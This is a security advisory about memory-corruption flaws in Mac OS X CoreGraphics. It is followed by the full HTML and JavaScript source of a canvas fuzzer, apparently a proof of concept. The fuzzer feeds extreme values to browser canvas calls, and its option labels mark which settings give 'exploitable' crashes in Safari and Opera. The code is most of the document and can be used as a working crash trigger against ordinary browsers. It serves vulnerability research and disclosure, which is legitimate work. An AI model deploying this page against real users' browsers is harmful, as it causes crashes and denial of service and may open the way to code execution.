source: https://www.securityfocus.com/bid/30488/info

Apple Mac OS X is prone to multiple memory-corruption vulnerabilities that affect the CoreGraphics component.

Attackers can exploit these issues to execute arbitrary code in the context of the affected application or cause denial-of-service conditions.

The following versions are affected:

Mac OS X v10.4.11 and prior
Mac OS X Server v10.4.11 and prior
Mac OS X v10.5.4 and prior
Mac OS X Server v10.5.4 and prior

NOTE: These issues were previously covered in BID 30483 (Apple Mac OS X 2008-005 Multiple Security Vulnerabilities), but have been given their own record to better document them.

<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script>